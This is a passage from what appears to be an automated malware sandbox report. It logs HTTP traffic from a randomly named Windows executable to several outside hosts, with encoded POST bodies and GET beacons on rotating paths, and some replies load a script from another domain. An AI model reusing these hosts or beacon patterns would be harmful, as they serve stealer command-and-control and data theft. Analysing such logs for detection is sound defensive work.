                                            Data Raw: 5a 36 5a 54 47 3d 38 57 4b 53 5a 66 58 64 70 41 63 35 36 4e 2b 77 31 36 57 39 39 46 35 64 39 77 72 70 37 51 34 49 74 6b 4f 74 49 59 76 76 6e 2b 33 30 6a 43 73 6c 71 65 46 69 38 57 69 73 4a 4a 2f 34 67 43 71 53 55 79 68 43 38 4a 72 38 48 51 72 46 6a 45 42 35 49 31 44 50 4f 46 42 79 50 59 41 4b 2b 5a 32 67 4a 6a 64 6c 72 6f 4d 2b 59 32 6a 4d 62 56 62 32 65 4e 6b 4e 4c 77 59 5a 56 73 50 66 4d 52 6d 64 30 32 4d 77 55 4c 71 44 46 61 78 43 4c 4b 4e 49 6a 55 47 38 68 4a 50 63 75 69 4c 6c 73 32 76 43 52 7a 43 4e 31 7a 52 51 6e 50 72 72 4e 49 71 6a 4a 4b 73 62 4b 6a 37 48 7a 71 64 51 41 73 56 4a 49 78 69 36 53 62 55 58 67 5a 75 39 5a 6e 39 35 77 33 67 77 6a 49 4c 32 4f 4d 54 62 71 41 67 46 73 33 69 78 70 76 4f 69 62 4c 77 30 73 78 36 39 44 30 55 73 6a 54 48 75 4a 72 30 75 78 57 30 2f 44 63 58 62 72 6b 2f 4e 33 50 63 4b 6f 54 77 53 54 4d 63 32 68 4e 68 79 77 76 73 6e 53 33 79 75 4a 74 42 76 6c 6e 32 62 6b 37 4b 30 75 55 67 69 71 2b 72 73 36 66 68 75 77 59 42 61 47 69 35 38 31 6b 5a 6d 32 6f 4f 61 56 69 55 35 [TRUNCATED]
                                            Data Ascii: Z6ZTG=8WKSZfXdpAc56N+w16W99F5d9wrp7Q4ItkOtIYvvn+30jCslqeFi8WisJJ/4gCqSUyhC8Jr8HQrFjEB5I1DPOFByPYAK+Z2gJjdlroM+Y2jMbVb2eNkNLwYZVsPfMRmd02MwULqDFaxCLKNIjUG8hJPcuiLls2vCRzCN1zRQnPrrNIqjJKsbKj7HzqdQAsVJIxi6SbUXgZu9Zn95w3gwjIL2OMTbqAgFs3ixpvOibLw0sx69D0UsjTHuJr0uxW0/DcXbrk/N3PcKoTwSTMc2hNhywvsnS3yuJtBvln2bk7K0uUgiq+rs6fhuwYBaGi581kZm2oOaViU58cdZ+4cw6zGralpEUpyIcZN/1V31BGguNyh3RTqOZ4Mo8advRHIoycAiVRgpwS1smTN5LFRsDS4UYD682z2KoxB9pO0gAmIbOD9F7A66agD3EI3hV9WmVDO7Evd+YzOMVa9LA3sZ9qLgUHQKkEqJs0pbB0rCZmmV/BFUCmPH3E1dzPr7CZYpKYyuudwSuHk8L4EH1mxzMfHMtyIsf56KMX40BzdapW81ujeW3OlNFMN323OZlCNq513LEYMGWyOV+zzOmDL5YMITLRa53wKuGxseLQ37IBpWWZlgcLkJ3ufdgSjE+oaLx3bgX5Cj8Vn/TRO8dmpOHzWAWCaKkMUMoUR8qKB9neHVpMgwfVStkL0h+DgWttd4LwVTUX1db+hmZAqjNtg9oyqoYSG40IfjTcp3Y3WGW/LCzaflEQS4Y3ff7cD9wKRffiE6A1+c5qHl/8tyjYj4yG9E4CsRd655MT6jNe94Z1AwcMG9vFUlhyMnY+N8y8bNN+LtuNAws7FezPM673IIBYfChVS3ClGoUTcXx9AWVxNG1ldz1v+q4Z1xQsuunT0C3j4ufNSwgprRVjFIKyYudc1WSzNthGDABZfTd/Zg7ZcsaLQAeVE1q0wzR98HcX9YEY0yCGYDE+9rV8i5CjmMGtWba+Pp4G9o4s7nBLjWiOouTf [TRUNCATED]
                                            Jul 3, 2024 18:52:52.600522041 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:52 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.64972781.88.48.71805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:52:54.416510105 CEST486OUTGET /utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.limpiezasbarcelo.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:52:55.116456985 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:55 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.649728156.251.142.107805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:00.711011887 CEST724OUTPOST /awbu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.top65s.com
                                            Origin: http://www.top65s.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.top65s.com/awbu/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 67 64 6b 75 46 72 4a 42 55 59 74 6b 33 68 32 72 4f 59 33 47 64 59 59 6f 6a 4a 72 48 47 73 76 59 79 6c 6b 4a 6e 4c 79 36 39 56 41 4f 73 7a 66 48 49 37 54 48 4e 32 62 65 50 61 35 55 55 44 4a 5a 4f 48 37 65 49 6a 35 37 6b 4e 61 2b 6d 57 58 75 42 74 67 45 6d 36 39 4b 35 43 64 6d 38 6c 53 58 55 6b 7a 4c 75 70 59 6e 78 51 43 4e 41 6d 59 4e 30 50 54 62 76 61 4f 50 32 72 2f 79 62 4a 45 4c 64 64 70 76 6a 65 4e 78 62 48 46 6b 70 52 69 61 4b 72 6e 41 67 7a 55 2b 58 71 68 4f 74 72 72 68 58 6c 70 55 4c 37 50 76 2b 54 4b 30 4b 2b 33 71 4e 76 61 4a 55 46 38 4f 2f 67 4a 4a 53 6e 49 67 4a 38 4c 75 47 74 4e 70 65 67 5a 7a
                                            Data Ascii: Z6ZTG=gdkuFrJBUYtk3h2rOY3GdYYojJrHGsvYylkJnLy69VAOszfHI7THN2bePa5UUDJZOH7eIj57kNa+mWXuBtgEm69K5Cdm8lSXUkzLupYnxQCNAmYN0PTbvaOP2r/ybJELddpvjeNxbHFkpRiaKrnAgzU+XqhOtrrhXlpUL7Pv+TK0K+3qNvaJUF8O/gJJSnIgJ8LuGtNpegZz
                                            Jul 3, 2024 18:53:01.311511993 CEST192INHTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 71 74 74 38 70 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.649729156.251.142.107805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:03.258177042 CEST748OUTPOST /awbu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.top65s.com
                                            Origin: http://www.top65s.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.top65s.com/awbu/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 67 64 6b 75 46 72 4a 42 55 59 74 6b 30 43 2b 72 43 5a 33 47 57 59 59 6e 76 70 72 48 55 73 76 63 79 6c 34 4a 6e 50 69 4d 39 6e 55 4f 31 52 48 48 61 36 54 48 65 47 62 65 42 36 35 49 62 6a 4a 53 4f 48 6d 74 49 68 74 37 6b 4e 4f 2b 6d 58 4c 75 42 61 30 46 6e 71 39 4d 30 69 64 65 7a 46 53 58 55 6b 7a 4c 75 74 35 79 78 51 61 4e 41 32 49 4e 30 75 54 59 6d 36 4f 4d 78 72 2f 79 66 4a 45 50 64 64 70 4a 6a 63 70 66 62 46 4e 6b 70 55 65 61 4a 36 6e 44 71 7a 55 38 64 4b 68 41 6f 75 4f 31 4f 6c 41 50 58 6f 37 4f 71 54 57 73 50 49 32 77 52 63 61 71 47 56 63 4d 2f 69 52 37 53 48 49 4b 4c 38 7a 75 55 36 42 4f 52 55 38 51 70 4b 35 42 42 4e 48 57 6b 6a 54 4a 51 32 2b 2f 66 6e 65 30 39 67 3d 3d
                                            Data Ascii: Z6ZTG=gdkuFrJBUYtk0C+rCZ3GWYYnvprHUsvcyl4JnPiM9nUO1RHHa6THeGbeB65IbjJSOHmtIht7kNO+mXLuBa0Fnq9M0idezFSXUkzLut5yxQaNA2IN0uTYm6OMxr/yfJEPddpJjcpfbFNkpUeaJ6nDqzU8dKhAouO1OlAPXo7OqTWsPI2wRcaqGVcM/iR7SHIKL8zuU6BORU8QpK5BBNHWkjTJQ2+/fne09g==
                                            Jul 3, 2024 18:53:03.830629110 CEST192INHTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 71 74 74 38 70 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.649730156.251.142.107805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:05.798965931 CEST1761OUTPOST /awbu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.top65s.com
                                            Origin: http://www.top65s.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.top65s.com/awbu/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 67 64 6b 75 46 72 4a 42 55 59 74 6b 30 43 2b 72 43 5a 33 47 57 59 59 6e 76 70 72 48 55 73 76 63 79 6c 34 4a 6e 50 69 4d 39 6e 73 4f 31 43 50 48 49 5a 72 48 64 47 62 65 4a 61 35 59 62 6a 4a 31 4f 48 75 79 49 68 51 4d 6b 50 32 2b 6d 31 44 75 4b 4f 59 46 75 71 39 4d 39 43 64 6c 38 6c 53 6e 55 67 58 50 75 70 64 79 78 51 61 4e 41 7a 45 4e 39 66 54 59 67 36 4f 50 32 72 2b 7a 62 4a 46 59 64 64 77 79 6a 63 74 68 62 30 74 6b 70 31 75 61 5a 59 66 44 69 7a 55 36 65 4b 67 47 6f 75 4b 44 4f 6a 6b 44 58 6f 2f 30 71 53 75 73 4e 35 48 71 4b 49 61 33 58 58 41 37 6a 67 42 6e 58 7a 52 31 46 74 6a 56 61 36 77 6d 63 56 67 30 70 75 73 62 49 73 79 50 6e 52 6d 38 63 44 48 62 54 54 33 2f 6c 58 4c 68 50 59 6c 49 41 70 34 64 59 53 41 74 77 32 45 65 58 57 34 49 64 33 6b 72 61 44 43 32 6b 49 37 37 4e 72 4f 36 75 58 7a 64 67 67 6c 62 59 59 56 69 33 4c 45 31 31 6c 31 6f 6b 35 49 41 50 37 74 51 72 7a 49 50 6e 6a 4f 34 4e 4e 54 54 52 55 49 6f 65 66 46 51 41 42 61 72 66 38 62 4e 64 6a 73 6e 38 53 58 65 75 41 71 75 [TRUNCATED]
                                            Data Ascii: Z6ZTG=gdkuFrJBUYtk0C+rCZ3GWYYnvprHUsvcyl4JnPiM9nsO1CPHIZrHdGbeJa5YbjJ1OHuyIhQMkP2+m1DuKOYFuq9M9Cdl8lSnUgXPupdyxQaNAzEN9fTYg6OP2r+zbJFYddwyjcthb0tkp1uaZYfDizU6eKgGouKDOjkDXo/0qSusN5HqKIa3XXA7jgBnXzR1FtjVa6wmcVg0pusbIsyPnRm8cDHbTT3/lXLhPYlIAp4dYSAtw2EeXW4Id3kraDC2kI77NrO6uXzdgglbYYVi3LE11l1ok5IAP7tQrzIPnjO4NNTTRUIoefFQABarf8bNdjsn8SXeuAqua1feUW+wFYv0EaxlGMipW0AJEEHfNABICFKiTeRyYng1XR3QpJV0T/MgIjtr+vCidoBEMNNq8zjmqi2sJdrtRdbr+1GVMPAaNfecbpGnAjNYD0iQECBCYvXbIBbBPGW6hFY+ApO8liTT9KGPQKN6ooy/kEKLidVZXov9sj3nu58E5iB7VCmj7ceY+Go5edhaZS9YEjTcYfl5Xkbwwp/dueSbd77oxHt2JNqfCnFj2MZvYBk/2/cucfjpGHPleoGU8o78DuOr9QctS6lQrIvUksguNlh22UL0JF3afXMS0pmYlBs3sriBgA/uPdDFNZD2Go8ha53JRQkTAcLdWcxhvqk6RuX9XM/XAcuAFJu9FYq+6z8+L95MMIJwU/cVG1lyN0alnN0IBGBXJOL/faUjWVqnnb9e7psFOh6ktSe56YfxcMIPBNJpp1h7ndfn/HzxqmsY+5EqKsKnrCf4tyuA9OldRf5ZaiC6ubt9ZvRD4lwo8ahoeIkWyN92ILoDV6tRLTbj5Psl87sGsRHi//pJmFtC9Ganx9jQ1nQRay8osurczJqmNQoWShDr2elG9yXp4j8lO7d0TgnubhKqpusgJpYtRbQF/7nmozqe1866QefQ5WbaKwW4wI1WOkWUPGvRKmMeOL5xLrb+11KIDYpxCsO2hK+CjXNAgM [TRUNCATED]
                                            Jul 3, 2024 18:53:06.325517893 CEST192INHTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 71 74 74 38 70 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.649731156.251.142.107805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:08.338696003 CEST476OUTGET /awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.top65s.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:09.105983973 CEST192INHTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 71 74 74 38 70 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.64973381.88.57.70805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:14.206666946 CEST730OUTPOST /hfmm/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.videos60.com
                                            Origin: http://www.videos60.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.videos60.com/hfmm/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 41 48 68 76 32 35 6f 4b 6d 32 74 71 39 6b 34 32 62 62 31 6c 4d 4f 77 79 64 6a 38 2f 72 53 78 45 78 62 78 55 44 6a 78 58 6f 78 61 43 36 66 63 73 6c 73 64 6c 72 45 77 42 30 6f 30 4e 79 74 35 6e 33 55 6f 72 52 34 53 7a 47 37 4d 61 43 46 54 74 59 39 62 54 67 30 54 35 44 4d 51 4a 73 35 71 67 77 6f 33 70 49 77 33 58 4d 44 30 41 38 38 6c 63 48 6d 50 50 69 4b 4e 67 74 30 32 39 61 72 62 57 62 56 5a 62 70 6f 6d 37 54 4d 6f 48 55 6b 4c 32 30 62 7a 48 61 37 74 68 79 7a 44 74 73 36 4c 52 2f 30 6f 6a 58 49 57 6f 66 49 4c 30 33 67 54 33 75 78 61 4a 74 47 49 62 52 49 66 67 43 7a 4a 63 2b 53 4f 46 46 64 39 48 69 33 51 6b
                                            Data Ascii: Z6ZTG=AHhv25oKm2tq9k42bb1lMOwydj8/rSxExbxUDjxXoxaC6fcslsdlrEwB0o0Nyt5n3UorR4SzG7MaCFTtY9bTg0T5DMQJs5qgwo3pIw3XMD0A88lcHmPPiKNgt029arbWbVZbpom7TMoHUkL20bzHa7thyzDts6LR/0ojXIWofIL03gT3uxaJtGIbRIfgCzJc+SOFFd9Hi3Qk
                                            Jul 3, 2024 18:53:14.911663055 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:14 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.64973481.88.57.70805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:16.746392012 CEST754OUTPOST /hfmm/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.videos60.com
                                            Origin: http://www.videos60.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.videos60.com/hfmm/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 41 48 68 76 32 35 6f 4b 6d 32 74 71 38 46 49 32 63 34 4e 6c 64 2b 77 78 53 44 38 2f 6c 43 78 41 78 61 4e 55 44 68 63 4d 70 45 79 43 36 2b 73 73 6d 70 39 6c 37 55 77 42 67 34 30 49 38 4e 35 61 33 55 30 5a 52 39 71 7a 47 37 6f 61 43 45 6a 74 59 4c 54 51 79 30 54 2f 4b 73 51 4c 69 5a 71 67 77 6f 33 70 49 78 53 66 4d 44 73 41 38 4e 56 63 49 6b 72 4d 38 36 4e 6a 75 30 32 39 65 72 62 6f 62 56 59 34 70 74 44 75 54 4b 6b 48 55 67 44 32 31 4f 48 47 4e 72 74 6e 34 54 43 4f 72 4c 61 37 33 6e 31 54 57 36 79 45 66 76 33 76 2f 32 53 74 79 43 61 71 2f 57 6f 5a 52 4b 48 53 43 54 4a 32 38 53 32 46 58 4b 78 67 74 44 31 48 51 65 52 4a 43 53 55 47 4a 6a 36 5a 44 55 44 32 39 74 52 47 68 51 3d 3d
                                            Data Ascii: Z6ZTG=AHhv25oKm2tq8FI2c4Nld+wxSD8/lCxAxaNUDhcMpEyC6+ssmp9l7UwBg40I8N5a3U0ZR9qzG7oaCEjtYLTQy0T/KsQLiZqgwo3pIxSfMDsA8NVcIkrM86Nju029erbobVY4ptDuTKkHUgD21OHGNrtn4TCOrLa73n1TW6yEfv3v/2StyCaq/WoZRKHSCTJ28S2FXKxgtD1HQeRJCSUGJj6ZDUD29tRGhQ==
                                            Jul 3, 2024 18:53:17.413774967 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:17 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.64973581.88.57.70805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:19.276115894 CEST1767OUTPOST /hfmm/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.videos60.com
                                            Origin: http://www.videos60.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.videos60.com/hfmm/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
